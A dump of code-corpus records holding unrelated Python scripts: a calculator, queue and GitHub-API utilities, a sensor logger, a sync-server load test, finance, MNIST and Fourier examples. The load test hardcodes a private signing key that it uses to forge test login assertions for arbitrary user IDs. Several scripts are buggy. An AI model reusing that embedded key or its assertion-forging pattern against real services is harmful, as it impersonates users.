side):\n w = Frame(root)\n w.pack(side=side, expand=YES, fill=BOTH)\n return w\n\n\ndef button(root, side, text, command=None):\n w = Button(root, text=text, command=command)\n w.pack(side=side, expand=YES, fill=BOTH)\n return w\n\n\nclass Calculator(Frame):\n def __init__(self):\n\n Frame.__init__(self)\n\n self.pack(expand=YES, fill=BOTH)\n self.master.title('Simple Calculater')\n\n display = StringVar()\n\n Entry(self, relief=SUNKEN,textvariable=display).pack(side=TOP, expand=YES,fill=BOTH)\n\n for key in ('123', '456', '789', '-0.'):\n keyF = frame(self, TOP)\n for char in key:\n button(keyF, LEFT, char, lambda w=display, c=char: w.set(w.get() + c))\n\n opsF = frame(self, TOP)\n for char in '+-*/=':\n if char == '=':\n btn = button(opsF, LEFT, char)\n btn.bind('', lambda e, s=self, w=display: s.calc(w), '+')\n\n else:\n btn = button(opsF, LEFT, char, lambda w=display, s='%s' % char: w.set(w.get() + s))\n\n clearF = frame(self, BOTTOM)\n button(clearF, LEFT, 'clear', lambda w=display: w.set(''))\n\n\n\n def calc(self, display):\n try:\n display.set(fuck(display.get()))\n except:\n display.set(\"ERROR\")\n\n\n\nif __name__ == '__main__':\n print('ok')\n Calculator().mainloop()\n","sub_path":"calculator.py","file_name":"calculator.py","file_ext":"py","file_size_in_byte":3589,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"138951876","text":"\"\"\"\n@author: BeBlob\n\"\"\"\nimport argparse\nimport os\nimport pika\nimport S4_simple_queue_publish as ppub \nimport S4_simple_queue_read as rpub \n\nparser = argparse.ArgumentParser()\nparser.add_argument(\"--read\", help=\"read the messages\",\n action=\"store_true\")\nparser.add_argument(\"--publish\", help=\"write a message\",\n action=\"store_true\")\nargs = parser.parse_args()\n\nif args.read:\n print(\"read mode turned on\")\n rpub.read_messages()\n \nelif args.publish:\n print(\"publish mode turned on\")\n ppub.publish_message()\n\nelse :\n print('Aucun arguments valables')\n","sub_path":"s4/S4_queue_publish_read.py","file_name":"S4_queue_publish_read.py","file_ext":"py","file_size_in_byte":603,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"12257630","text":"#!/usr/bin/python3\n\nimport pandas\nimport os\nimport requests\nfrom requests.auth import HTTPBasicAuth\nfrom urllib.parse import urljoin\n\nuser = 'avcourt' # your github username\nkey = os.environ.get('GH_API') # your secret access token. you can hardcode yours.\n\nrepos_url = f'https://api.github.com/users/{user}/repos'\nrepo_names = [repo[\"name\"] for repo in requests.get(repos_url).json()]\n\ninsights = []\nbase_url = f'https://api.github.com/repos/{user}/'\n\nprint(\"Getting traffic insights for repos:\")\nfor repo in repo_names:\n print(f\"\\t- github.com/{user}/{repo}/\")\n repo_url = urljoin(base_url, repo + '/')\n traffic = requests.get(urljoin(repo_url, 'traffic/views'),\n auth=HTTPBasicAuth(user, key)).json()\n\n clones = requests.get(urljoin(repo_url, 'traffic/clones'),\n auth=HTTPBasicAuth(user, key)).json()[\"count\"]\n\n insights.append({'repo': repo,\n 'views': traffic['count'],\n 'uniques': traffic['uniques'],\n 'clones': clones\n })\n\nprint(\"\\n-- INSIGHTS --------------- Views / Clones --\")\nprint(\"---------------------------------------------\")\nprint(pandas.DataFrame(insights).to_string(index=False))\n","sub_path":"traffic.py","file_name":"traffic.py","file_ext":"py","file_size_in_byte":1258,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"172593548","text":"# Last changed May 31st, 2017\n# Thresholds set at (4,2) within MPR121_edited.py\n# Always run this script with , otherwise you won't get access to the MPR121\n# Also use python 3, otherwise the datetime.timestamp and datetime.fromtimestamp methods won't work\n\n\"\"\"This function prints the ‘raw’ ADC values for all 12 electrodes from a single sensor.\nNormal untouched ADC values should range between 215-230, whereas they should decrease\nto about 50-90 when touched. Different sensors addresses can be selected by adding the\n-a or –-address option followed by either one of the following addresses:\n0x5A, 0x5B, 0x5C, 0x5D (for sensors 1-4, respectively).\nata can be saved to a .txt file through the -s or –-save option.\n\"\"\"\n\nimport sys, time, argparse\nfrom datetime import datetime\nimport Adafruit_MPR121.MPR121_edited as MPR121\n\n# Set up argparse\nparser = argparse.ArgumentParser()\nparser.add_argument('-s', '--save', help = 'save raw ADC values to a .txt file',\naction = \"store_true\")\nparser.add_argument('-a', '--address', help = 'specify MPR121 address (values: \\\n0x5A (default), 0x5B, 0x5C, 0x5D)', type = str)\nargs = parser.parse_args()\n\nif args.address == None or args.address == '0x5A':\n address = 0x5A\nelif args.address == '0x5B':\n address = 0x5B\nelif args.address == '0x5C':\n address = 0x5C\nelif args.address == '0x5D':\n address = 0x5D \nelif not args.address in ['0x5A', '0x5B', '0x5C', '0x5D']:\n print('Error: invalid address specified (must be 0x5A, 0x5B, 0x5C, or 0x5D).')\n sys.exit(1)\n\n# Create MPR121 instance.\ncap = MPR121.MPR121()\n\n# Start communication with the MPR121 chip.\nif not cap.begin(address=address):\n print('Error initializing MPR121. Check your wiring!')\n sys.exit(1)\n\nif args.save:\n # Ask user for mouse ID and trial number to create corresponding text file.\n filename = input('Filename: ')\n if filename[-4:] != '.txt':\n filename += '.txt'\n\n# Main loop to print a message every time a pin is touched.\n# Note: this takes about 20 ms per loop iteration!\nprint('Collecting data. Press Ctrl-C to quit.')\nwhile True:\n touch_status = cap.touched()\n\n filtered = [cap.filtered_data(i) for i in range(12)]\n\n # Print touch status and raw data:\n print('Touch status: {}, Filtered: {}'.format(str(touch_status).zfill(4),filtered), end=12*' ', flush=True)\n print('\\r', end='', flush=True)\n\n if args.save:\n with open(filename, a) as f:\n f.write('{}, {}, {}\\n'.format(datetime.now().timestamp(),touch_status.zfill(4),filtered.strip('[]'))) # Need to convert touch_status and filtered to strings?\n","sub_path":"single_sensor_test.py","file_name":"single_sensor_test.py","file_ext":"py","file_size_in_byte":2600,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"398749570","text":"# ex27 The Truth Terms & The Truth Tables\n# ex28 Boolean Practice\n# ex29 What If\npeople = 20\ncats = 30\ndogs = 15\ndogs += 5\nif people >= dogs:\n print(\"People are greater or equal to dogs\") \nif people <= dogs:\n print(\"People are less than or equal to daogs\")\nif people == dogs:\n print(\"People are dogs.\")\n\n# ex30 Else and If\ncars = 40\ntrucks = 15\nif cars > people:\n print(\"We should take the cars\")\nelif cars < people:\n print(\"We should not take the cars\")\nelse:\n print(\"We can't decide\")","sub_path":"learn-python-the-hard-way/Ex27-30.py","file_name":"Ex27-30.py","file_ext":"py","file_size_in_byte":504,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"399308703","text":"# This Source Code Form is subject to the terms of the Mozilla Public\n# License, v. 2.0. If a copy of the MPL was not distributed with this file,\n# You can obtain one at http://mozilla.org/MPL/2.0/.\n\"\"\"\nLoad test for the SyncStorage server\n\"\"\"\nimport os\nimport hmac\nimport random\nimport time\nfrom urllib.parse import urlparse, urlunparse\nimport base64\nimport hashlib\n\nfrom tokenlib import make_token, get_derived_secret as derive\nimport browserid.jwt\nimport browserid.tests.support\n\nfrom molotov import (json_request, global_setup, set_var, get_var, scenario,\n setup)\n\n\n# Assertions are good for one year (in seconds).\n# This avoids having to deal with clock-skew in tokenserver requests.\nASSERTION_LIFETIME = 60 * 60 * 24 * 365\n\nMOCKMYID_DOMAIN = \"mockmyid.s3-us-west-2.amazonaws.com\"\nMOCKMYID_PRIVATE_KEY = browserid.jwt.DS128Key({\n \"algorithm\": \"DS\",\n \"x\": \"385cb3509f086e110c5e24bdd395a84b335a09ae\",\n \"y\": \"738ec929b559b604a232a9b55a5295afc368063bb9c20fac4e53a74970a4db795\"\n \"6d48e4c7ed523405f629b4cc83062f13029c4d615bbacb8b97f5e56f0c7ac9bc1\"\n \"d4e23809889fa061425c984061fca1826040c399715ce7ed385c4dd0d40225691\"\n \"2451e03452d3c961614eb458f188e3e8d2782916c43dbe2e571251ce38262\",\n \"p\": \"ff600483db6abfc5b45eab78594b3533d550d9f1bf2a992a7a8daa6dc34f8045a\"\n \"d4e6e0c429d334eeeaaefd7e23d4810be00e4cc1492cba325ba81ff2d5a5b305a\"\n \"8d17eb3bf4a06a349d392e00d329744a5179380344e82a18c47933438f891e22a\"\n \"eef812d69c8f75e326cb70ea000c3f776dfdbd604638c2ef717fc26d02e17\",\n \"q\": \"e21e04f911d1ed7991008ecaab3bf775984309c3\",\n \"g\": \"c52a4a0ff3b7e61fdf1867ce84138369a6154f4afa92966e3c827e25cfa6cf508b\"\n \"90e5de419e1337e07a2e9e2a3cd5dea704d175f8ebf6af397d69e110b96afb17c7\"\n \"a03259329e4829b0d03bbc7896b15b4ade53e130858cc34d96269aa89041f40913\"\n \"6c7242a38895c9d5bccad4f389af1d7a4bd1398bd072dffa896233397a\",\n})\n\n\n_DEFAULT = \"https://token.stage.mozaws.net\"\n\n\ndef b64encode(data):\n return base64.b64encode(data).decode(\"ascii\")\n\n\nclass StorageClient(object):\n def __init__(self, server_url=_DEFAULT):\n self.timeskew = 0\n self.server_url = server_url\n self.auth_token = None\n self.auth_secret = None\n self.endpoint_url = None\n self.endpoint_scheme = None\n self.endpoint_host = None\n self.generate()\n\n def __repr__(self):\n return str(self.auth_token)\n\n def generate(self):\n \"\"\"Pick an identity, log in and generate the auth token.\"\"\"\n # If the server_url has a hash fragment, it's a storage node and\n # that's the secret. Otherwise it's a token server url.\n uid = random.randint(1, 1000000)\n url = urlparse(self.server_url)\n if url.fragment:\n endpoint = url._replace(fragment=\"\", path=\"/1.5/\" + str(uid))\n self.endpoint_url = urlunparse(endpoint)\n data = {\n \"uid\": uid,\n \"node\": urlunparse(url._replace(fragment=\"\")),\n \"expires\": time.time() + ASSERTION_LIFETIME,\n }\n self.auth_token = make_token(data, secret=url.fragment)\n self.auth_secret = derive(self.auth_token, secret=url.fragment)\n else:\n email = \"user%s@%s\" % (uid, MOCKMYID_DOMAIN)\n exp = time.time() + ASSERTION_LIFETIME + self.timeskew\n assertion = browserid.tests.support.make_assertion(\n email=email,\n audience=self.server_url,\n issuer=MOCKMYID_DOMAIN,\n issuer_keypair=(None, MOCKMYID_PRIVATE_KEY),\n exp=int(exp * 1000),\n )\n token_url = self.server_url + \"/1.0/sync/1.5\"\n response = json_request(token_url, headers={\n \"Authorization\": \"BrowserID \" + assertion,\n })\n # Maybe timeskew between client and server?\n if response['status'] == 401:\n server_time = int(response['headers'][\"X-Timestamp\"])\n self.timeskew = server_time - int(time.time())\n exp = time.time() + ASSERTION_LIFETIME + self.timeskew\n assertion = browserid.tests.support.make_assertion(\n email=email,\n audience=self.server_url,\n issuer=MOCKMYID_DOMAIN,\n issuer_keypair=(None, MOCKMYID_PRIVATE_KEY),\n exp=int(exp * 1000),\n )\n response = json_request(token_url, headers={\n \"Authorization\": \"BrowserID \" + assertion,\n })\n\n if response['status'] > 299:\n raise ValueError(response['status'])\n\n credentials = response['content']\n self.auth_token = credentials[\"id\"].encode('ascii')\n self.auth_secret = credentials[\"key\"].encode('ascii')\n self.endpoint_url = credentials[\"api_endpoint\"]\n\n url = urlparse(self.endpoint_url)\n self.endpoint_scheme = url.scheme\n if ':' in url.netloc:\n self.endpoint_host, self.endpoint_port = url.netloc.rsplit(\":\", 1)\n else:\n self.endpoint_host = url.netloc\n if url.scheme == \"http\":\n self.endpoint_port = \"80\"\n else:\n self.endpoint_port = \"443\"\n\n def _normalize(self, params, path_qs, meth='GET'):\n bits = []\n bits.append(\"hawk.1.header\")\n bits.append(params[\"ts\"])\n bits.append(params[\"nonce\"])\n bits.append(meth)\n bits.append(path_qs)\n bits.append(self.endpoint_host.lower())\n bits.append(self.endpoint_port)\n bits.append(params.get(\"hash\", \"\"))\n bits.append(params.get(\"ext\", \"\"))\n bits.append(\"\") # to get the trailing newline\n return \"\\n\".join(bits)\n\n def _sign(self, params, path_qs, meth='GET'):\n algorithm = \"sha256\"\n sigstr = self._normalize(params, path_qs, meth)\n sigstr = sigstr.encode(\"ascii\")\n key = self.auth_secret\n hashmod = hashlib.sha256\n return b64encode(hmac.new(key, sigstr, hashmod).digest())\n\n def _auth(self, params, path_qs, meth='GET'):\n params = {\"ts\": str(int(time.time()) + self.timeskew)}\n params[\"id\"] = self.auth_token.decode('ascii')\n params[\"ts\"] = str(int(time.time()))\n params[\"nonce\"] = b64encode(os.urandom(5))\n params[\"mac\"] = self._sign(params, path_qs, meth)\n res = ', '.join(['%s=\"%s\"' % (k, v) for k, v in params.items()])\n return 'Hawk ' + res\n\n async def get(self, session, path_qs, *args, **kw):\n url = self.endpoint_url + path_qs\n headers = {'Authorization': self._auth('GET', path_qs),\n 'Host': self.endpoint_host}\n\n async with session.get(url, headers=headers) as resp:\n if resp.status == 401:\n server_time = int(float(resp.headers[\"X-Weave-Timestamp\"]))\n self.timeskew = server_time - int(time.time())\n headers['Authorization'] = self._auth('GET', path_qs)\n async with session.get(url, headers=headers) as resp:\n return resp\n else:\n return resp\n\n\n@global_setup()\ndef set_token(args):\n set_var('client', StorageClient())\n\n\n@scenario(1)\nasync def test(session):\n storage = get_var('client')\n url = \"/info/collections\"\n\n resp = await storage.get(session, url)\n assert resp.status in (200, 404)\n","sub_path":"loadtest.py","file_name":"loadtest.py","file_ext":"py","file_size_in_byte":7461,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"272049247","text":"#!/usr/bin/env python\n# coding: utf-8\n\n# In[1]:\n\n\n# Data handling\nimport pandas as pd\nimport numpy as np\n\n# Bokeh libraries\nfrom bokeh.io import output_file, output_notebook\nfrom bokeh.plotting import figure, show\nfrom bokeh.models import ColumnDataSource\nfrom bokeh.layouts import row, column, gridplot\nfrom bokeh.models.widgets import Tabs, Panel\n\n#Plotting\nimport geopandas as gpd\n\nfig = figure()\n\n\ndf = pd.read_csv('cleanfeatures.csv', index_col=0)\ndf.rename(columns={'Election type':'Election_type'}, inplace=True)\n\n# Import reset_output (only needed once)\nfrom bokeh.plotting import reset_output\n\n# Use reset_output() between subsequent show() calls, as needed\nreset_output()\n\n\nshapefile = 'Shape_Files/ne_110m_admin_0_countries.shp'\n#Read shapefile using Geopandas\ngdf = gpd.read_file(shapefile)[['ADMIN', 'ADM0_A3', 'geometry']]\n#Rename columns.\ngdf.columns = ['country', 'country_code', 'geometry']\ngdf = gdf.drop(gdf.index[159])\n\n\n#Drop row corresponding to 'Antarctica'\ngdf = gdf.drop(gdf.index[159])\n\n\nfrom bokeh.io import curdoc, output_notebook\nfrom bokeh.models import Slider, HoverTool\nfrom bokeh.layouts import widgetbox, row, column\nfrom bokeh.models import GeoJSONDataSource, LinearColorMapper, ColorBar\nfrom bokeh.palettes import brewer\nimport json\n#Define function that returns json_data for year selected by user.\n\ndef json_data(selectedYear):\n yr = selectedYear\n df_yr = df[df['Year'] == yr]\n merged = gdf.merge(df_yr, left_on = 'country_code', right_on ='iso3', how = 'left')\n merged.fillna('No data', inplace = True)\n merged_json = json.loads(merged.to_json())\n json_data = json.dumps(merged_json)\n return json_data\n#Input GeoJSON source that contains features for plotting.\ngeosource = GeoJSONDataSource(geojson = json_data('2016'))\n#Define a sequential multi-hue color palette.\npalette = brewer['YlGnBu'][5]\n#Reverse color order so that dark blue is highest obesity.\npalette = palette[::-1]\n#Instantiate LinearColorMapper that linearly maps numbers in a range, into a sequence of colors. Input nan_color.\ncolor_mapper = LinearColorMapper(palette = palette, low = 0, high = 100, nan_color = '#d9d9d9')\n#Define custom tick labels for color bar.\ntick_labels = {'0': '0%', '20':'20%', '40':'40%', '60':'60%', '80': '80%', '100': '100%'}\n#Add hover tool\nhover = HoverTool(tooltips = [ ('Country/region','@Country'),('Type of election', '@Election_type'),('% of voting age population that voted', '@VAP_Turnout_Percentage{11.11}'), ('Compulsory Voting', '@Compulsory_voting')])\n#Create color bar.\ncolor_bar = ColorBar(color_mapper=color_mapper, label_standoff=8,width = 500, height = 20,\n border_line_color=None,location = (0,0), orientation = 'horizontal', major_label_overrides = tick_labels)\n#Create figure object.\np = figure(title = 'Registered Voters who Voted, 2016', plot_height = 600 , plot_width = 950, toolbar_location = 'below', toolbar_sticky=True, tools = [hover])\np.xgrid.grid_line_color = None\np.ygrid.grid_line_color = None\n#Add patch renderer to figure.\np.patches('xs','ys', source = geosource,fill_color = {'field' :'VAP_Turnout_Percentage', 'transform' : color_mapper},\n line_color = 'black', line_width = 0.25, fill_alpha = 1)\n#Specify layout\np.add_layout(color_bar, 'below')\n# Define the callback function: update_plot\ndef update_plot(attr, old, new):\n yr = slider.value\n new_data = json_data(yr)\n geosource.geojson = new_data\n p.title.text = 'Voting Age Population That Voted, %d' %yr\n\n# Make a slider object: slider\nslider = Slider(title = 'Year',start = 1990, end = 2017, step = 1, value = 2016)\nslider.on_change('value', update_plot)\n# Make a column layout of widgetbox(slider) and plot, and add it to the current document\nlayout = column(p,widgetbox(slider))\ncurdoc().add_root(layout)\n#Display plot inline in Jupyter notebook\noutput_notebook()\n#Display plot\nshow(layout)\n","sub_path":"MapScript.py","file_name":"MapScript.py","file_ext":"py","file_size_in_byte":3880,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"569956654","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Fri Sep 29 20:01:32 2017\n\n@author: Joao Marcos Costa\n\"\"\"\n\n\nimport numpy as np\nimport matplotlib.pyplot as plt\nfrom scipy import integrate\n\ndef _cos(x,func,n_,w_):\n\treturn func(x)*np.cos(x*n_*w_)\n\t\n\n\n\t\ndef _sin(x,func,n_,w_):\n\treturn func(x)*np.sin(x*n_*w_)\n\t\ndef an_bn(func,T0,n=10):\n\tbn=np.zeros(n)\n\tW = 2*np.pi/T0\n\tan=np.zeros(n)\n\n\tfor i in range(n):\n\t\tan[i]=(2/T0)*(integrate.quad(_cos,0,T0,args=(func,i,W))[0])\n\t\tbn[i]=(2/T0)*(integrate.quad(_sin,0,T0,args=(func,i,W))[0])\n\n\treturn an,bn\n\ndef rebuild(an_coefs,bn_coefs,T,x):\n\tw0 = 2*np.pi/T\n\tN = len(an_coefs)\n\tf_sum = 0\n\tfor n in range(N):\n\t\tf_sum += an_coefs[n]*np.cos(x*n*w0)\n\t\tf_sum += bn_coefs[n]*np.sin(x*n*w0)\n\treturn f_sum\n\t\nx = np.linspace(0,10,10000)\nT0 = 1/5000\n\n\n\n","sub_path":"fseries.py","file_name":"fseries.py","file_ext":"py","file_size_in_byte":769,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"168916831","text":"from tensorflow.examples.tutorials.mnist import input_data\r\nimport tensorflow as tf\r\nimport tensorflow.contrib.slim as slim\r\nimport numpy as np\r\nimport argparse\r\n\r\n\r\ndef model(input, is_training):\r\n with slim.arg_scope([slim.conv2d, slim.fully_connected],\r\n activation_fn=tf.nn.crelu,\r\n normalizer_fn=slim.batch_norm,\r\n normalizer_params={'is_training':is_training, 'decay':0.9}):\r\n conv1 = slim.conv2d(input, 16, kernel_size=3, scope='conv1')\r\n pool1 = slim.max_pool2d(conv1, kernel_size=2, scope='pool1')\r\n conv2 = slim.conv2d(pool1, 32, kernel_size=3, scope='conv2')\r\n pool2 = slim.max_pool2d(conv2, kernel_size=2, scope='pool2')\r\n flatten = slim.flatten(pool2, scope='flatten')\r\n fc1 = slim.fully_connected(flatten, 500, scope='fc1')\r\n dropout = slim.dropout(fc1, is_training=is_training)\r\n fc2 = slim.fully_connected(dropout, 10, activation_fn=None, scope='out')\r\n return fc2\r\n\r\ndef train(mnist):\r\n x = tf.placeholder(tf.float32, [None, 28, 28, 1], name='x-input')\r\n y_ = tf.placeholder(tf.float32, [None, 10], name='y-input')\r\n global_step = tf.Variable(0, trainable=False)\r\n\r\n y = model(x, True)\r\n cross_entropy = tf.nn.softmax_cross_entropy_with_logits_v2(logits=y, labels=y_)\r\n cross_entropy = tf.reduce_mean(cross_entropy)\r\n\r\n accuracy = tf.equal(tf.argmax(y, 1), tf.argmax(y_, 1))\r\n accuracy = tf.reduce_mean(tf.cast(accuracy, tf.float32))\r\n\r\n learning_rate = tf.train.exponential_decay(learning_rate=args.learning_rate, global_step=global_step,\r\n decay_steps=mnist.train.num_examples // args.batch_size,\r\n decay_rate=args.learning_rate_decay)\r\n update_ops = tf.get_collection(tf.GraphKeys.UPDATE_OPS)\r\n with tf.control_dependencies(update_ops):\r\n train_step = tf.train.GradientDescentOptimizer(learning_rate).minimize(cross_entropy, global_step)\r\n\r\n saver = tf.train.Saver()\r\n init = tf.global_variables_initializer()\r\n\r\n with tf.Session() as sess:\r\n init.run()\r\n for i in range(args.max_step):\r\n xs, ys = mnist.train.next_batch(args.batch_size)\r\n xs = np.reshape(xs, [args.batch_size, 28, 28, 1])\r\n _, loss, acc, step = sess.run([train_step, cross_entropy, accuracy, global_step], feed_dict={x: xs, y_: ys})\r\n if step % 500 == 0:\r\n print('{} epoches, loss: {}, accuracy: {}'.format(step, loss, acc))\r\n\r\n if step % 1000 == 0:\r\n saver.save(sess, args.logs + 'mnist_bn_model', global_step)\r\n\r\n\r\ndef evaluate(mnist):\r\n x = tf.placeholder(tf.float32, [None, 28, 28, 1], name='x-input')\r\n y_ = tf.placeholder(tf.float32, [None, 10], name='y-input')\r\n\r\n y = model(x, False)\r\n\r\n pred = tf.equal(tf.argmax(y, 1), tf.argmax(y_, 1))\r\n accuracy = tf.reduce_mean(tf.cast(pred, tf.float32))\r\n\r\n feed_dict = {x: np.reshape(mnist.validation.images, [-1, 28, 28, 1]), y_: mnist.validation.labels}\r\n saver = tf.train.Saver()\r\n\r\n with tf.Session() as sess:\r\n saver.restore(sess, args.logs + 'mnist_bn_model-' + str(args.max_step))\r\n acc = sess.run(accuracy, feed_dict=feed_dict)\r\n print('test accuracy: {}'.format(acc))\r\n\r\nif __name__ == '__main__':\r\n parser = argparse.ArgumentParser(description='train or evaluate mnist of using bn layer')\r\n parser.add_argument('command', metavar='', help='train or evaluate')\r\n parser.add_argument('--batch_size', default=100, help='num pictures of one batch')\r\n parser.add_argument('--learning_rate', default=0.8, help='initial learning rate of the net')\r\n parser.add_argument('--learning_rate_decay', default=0.9, help='rate decay after one epoch')\r\n parser.add_argument('--max_step',default=3000, help='total step for training')\r\n parser.add_argument('--logs', default='path/logs/', help='Logs and checkpoints directory')\r\n\r\n args = parser.parse_args()\r\n print('command:', args.command)\r\n print('batch_size:', args.batch_size)\r\n print('learning_rate:', args.learning_rate)\r\n print('learning_rate_decay:', args.learning_rate_decay)\r\n print('max_step:', args.max_step)\r\n\r\n mnist = input_data.read_data_sets('MNIST_data', one_hot=True)\r\n if args.command == 'train':\r\n train(mnist)\r\n else:\r\n print('loading weights...')\r\n evaluate(mnist)","sub_path":"tensorlfow bn_layer/mnist_bn.py","file_name":"mnist_bn.py","file_ext":"py","file_size_in_byte":4465,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"593395100","text":"class Solution(object):\n def pivotIndex(self, nums):\n \"\"\"\n :type nums: List[int]\n :rtype: int\n \"\"\"\n l_sum = 0 \n r_sum = sum(nums)\n n = len(nums)\n \n for i in range(0,n):\n r_sum -= nums[i]\n if l_sum==r_sum:\n return i\n l_sum += nums[i]\n \n return -1","sub_path":"Pivot_index/pivot_index_sol1.py","file_name":"pivot_index_sol1.py","file_ext":"py","file_size_in_byte":373,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"574885955","text":"from typing import TypeVar, Sequence, Mapping, Set, Tuple\nfrom scipy.linalg import eig\nfrom base_files import mdp\nfrom base_files import value_iteration\nimport numpy as np\nimport random\nimport copy\nimport math\n\nS = Tuple[float, float]\nA = Tuple[float, float]\n\ntrans_matrix_type = Mapping[S, Mapping[A, Mapping[S, float]]]\nreward_type = Mapping[S, Mapping[A, float]]\npolicy_type = Mapping[S, Mapping[A, float]]\n\nclass mertonPortofolio():\n def __init__(self, \n expiry : float, \n r : float, \n mu : np.ndarray,\n cov : np.ndarray,\n epsilon: float,\n gamma: float):\n self.expiry = expiry # = T\n self.r = r # = risk-free rate\n self.mu = mu # = risky rate means (1-D array of length num risky assets)\n self.cov = cov # = risky rate covariances (2-D square array of length num risky assets)\n self.epsilon = epsilon # = bequest parameter\n self.gamma = gamma # = CRRA parameter\n\n def getMertonTransition(self, \n state: Tuple[float, float], \n action: Tuple[float, float]):\n risky_return = np.random.normal(self.mu[0], self.cov[0])\n wealth = state[1]\n risky_allocation = action[0]\n wealth_consumption = action[1]\n next_wealth = (wealth - wealth_consumption) * \\\n ((1 - risky_allocation) * (1 + self.r) + risky_allocation * (1 + risky_return))\n return [state[0] + 1, next_wealth[0]]\n\n def getMertonReward(self, state: S) ->float :\n time = state[0]\n wealth = state[1]\n if time != self.expiry:\n if self.gamma == 0:\n return np.log(wealth)\n else:\n return wealth ** (1.0-self.gamma) / (1.0-self.gamma)\n else:\n return 0.0\n\n def getMertonDataAll(self,\n state: Tuple[float, float]) -> Tuple[trans_matrix_type, reward_type, policy_type]:\n transition_matrix : trans_matrix_type = {}\n reward : reward_type = {}\n policy : policy_type = {}\n t = 0\n all_merton_states = []\n all_merton_states.append(state)\n while t < self.expiry:\n state = tuple(all_merton_states.pop(0))\n # assume for each state, there are two possible actions, each are generated randomly\n # this assumption is made so that we can simplify the MDP\n action_1 = tuple([random.uniform(0, 5), random.uniform(0, 5)])\n action_2 = tuple([random.uniform(0, 5), random.uniform(0, 5)])\n next_state_1 = tuple(self.getMertonTransition(state, action_1))\n next_state_2 = tuple(self.getMertonTransition(state, action_2))\n sub_dict_1 = {action_1: {next_state_1: 1.0}}\n sub_dict_2 = {action_2: {next_state_2: 1.0}} \n if state in transition_matrix.keys():\n list1 = list(transition_matrix.items())\n list2 = list(sub_dict_1.items())\n list1[0][1][list2[0][0]] = list2[0][1]\n transition_matrix = dict(list1)\n list1 = list(transition_matrix.items())\n list2 = list(sub_dict_2.items())\n list1[0][1][list2[0][0]] = list2[0][1]\n transition_matrix = dict(list1)\n else:\n transition_matrix[state] = copy.deepcopy(sub_dict_1)\n list1 = list(transition_matrix.items())\n list2 = list(sub_dict_2.items())\n list1[0][1][list2[0][0]] = list2[0][1]\n transition_matrix = dict(list1)\n reward[state] = {action_1: self.getMertonReward(state), \n action_2: self.getMertonReward(state)}\n policy[state] = {action_1: 0.5, action_2: 0.5}\n all_merton_states.append(next_state_1)\n all_merton_states.append(next_state_2)\n t += 0.1\n return [transition_matrix, reward, policy]\n\nif __name__ == '__main__':\n expiry = 0.4\n r = 0.04\n mu = np.array([0.08])\n cov = np.array([[0.0009]])\n epsilon = 1e-8\n gamma = 0.2\n discount_rate = 0.8\n\n mp = mertonPortofolio(expiry, r, mu, cov, epsilon, gamma)\n\n initial_wealth = 10\n initial_state = [0, initial_wealth]\n transition_matrix, reward, policy = mp.getMertonDataAll(initial_state)\n # print(policy)\n\n mdp = mdp.MDP(transition_matrix, reward, policy, discount_rate)\n vi_dict = value_iteration.valueIteration(mdp, 100)[0]\n new_dict = {}\n for key, val in vi_dict.items():\n if val != None and val != float('nan'):\n new_dict[key] = val\n print(\"Value iteration: \", new_dict)\n\n","sub_path":"Assignments/2_Financial_Application/merton_MDP_value_iteration.py","file_name":"merton_MDP_value_iteration.py","file_ext":"py","file_size_in_byte":4763,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"43328850","text":"# Example:\n# values = [{\"name\": \"Michelangelo\", \"food\": \"PIZZA\"}, {\"name\": \"Garfield\", \"food\": \"lasagna\"}]\n# string_factory(values)\n# [\"Hi, I'm Michelangelo and I love to eat PIZZA!\", \"Hi, I'm Garfield and I love to eat lasagna!\"]\n\ntemplate = \"Hi, I'm {name} and I love to eat {food}!\"\n\ndef string_factory(val):\n new = []\n for v in val:\n new.append(template.format(**v))\n # new.append(template + \".format(**v)\")\n return new\nvalues = [{\"name\": \"Michelangelo\", \"food\": \"PIZZA\"}, {\"name\": \"Garfield\", \"food\": \"lasagna\"}]\nprint(string_factory(values))\n","sub_path":"learn/th/python collection/dic/prac.py","file_name":"prac.py","file_ext":"py","file_size_in_byte":571,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"229055306","text":"import sys\nimport pprint\nimport collections\nsys.stdin = open('가능한 시험 점수.txt','r')\n\n\nT = int(input())\nfor tc in range(1,T+1):\n N = int(input())\n scores = list(map(int,input().split()))\n visit = [0] * 10001\n visit[0] = 1\n for s in scores:\n for i in range(10000,-1,-1):\n if visit[i]:\n visit[i + s] = 1\n print('#{} {}'.format(tc,sum(visit)))\n \n \n\n \n","sub_path":"10월/1001/가능한 시험 점수 너비우선.py","file_name":"가능한 시험 점수 너비우선.py","file_ext":"py","file_size_in_byte":418,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"574255230","text":"import requests\nimport os \nimport aiohttp \nimport asyncio \nif not os.path.exists('./pic_as'):\n os.mkdir('./pic_as')\nasync def fetch(session,url):\n print('发送请求',url)\n async with session.get(url,verify_ssl=False) as response:\n content = await response.content.read()\n file_path = './pic_as/'+ url.rsplit('/')[-1]\n with open(file_path,'wb') as fb:\n fb.write(content)\n print('下载完成:',url)\n\nasync def main():\n async with aiohttp.ClientSession() as session:\n url_list = {\n 'https://pic.qiushibaike.com/system/pictures/12436/124360753/medium/7TKGSDY0E3FBRC8Q.jpg',\n 'https://pic.qiushibaike.com/system/pictures/12437/124377444/medium/JBYNB7E71BC5NYRB.jpg',\n 